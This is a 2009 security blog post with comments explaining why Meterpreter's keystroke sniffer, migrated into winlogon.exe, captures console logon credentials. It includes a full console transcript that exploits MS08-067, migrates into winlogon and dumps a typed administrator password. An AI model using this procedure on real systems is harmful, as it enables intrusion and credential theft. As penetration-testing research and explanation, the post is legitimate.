In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's keystrokes.
While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should also have interactive access to the desktop; however, when I tried to sniff the active user's keystrokes from inside it, it did not work. The reason is that winlogon.exe is attached to the Winlogon desktop (the logon and lock screen), not to the Default desktop where Explorer and the user's applications run, and each desktop has its own keyboard input: GetAsyncKeyState only sees keys typed on the desktop the calling thread is attached to. So although a sniffer inside Winlogon cannot see the logged-on user's session, it does capture the username and password of anyone logging into the target's console. The example below demonstrates this:
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
[ wait for user login ]
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator <Tab> s3cretp4ss <Return>
Sunday, March 22, 2009

3 comments:
I think you already know that, but it is quite clear why winlogon.exe cannot sniff user processes; it is the same reason why user processes cannot sniff passwords when the desktop is locked. The interactive window station (WinSta0) has 3 desktops, "Default", "Disconnect" and "Winlogon", which share the mouse pointer but each have their own keyboard buffer and clipboard. Winlogon (and the lock workstation tool and screensavers) runs on the Winlogon desktop; Explorer runs on the Default desktop. (Services run on their own window station, either one winsta per user under whose credentials the service is running, or one winsta for all of them and one desktop for each user.)
You can list window stations and desktops using the free EnumWinstaGUI tool, and show the window station and desktop of a process in the "handles" view of Process Explorer.
The latest revision of meterpreter now has "enumdesktops" to locate these window stations/desktops and soon "setdesktop" to switch to one of them. Thanks for sharing!
Thanks for sharing that piece of information, mihi!!
Metasploit sure has matured into an awesome application. Very useful. I don't mean the exploits per se; the tools are a huge timesaver for a variety of stuff I'm working on ;)
Thanks.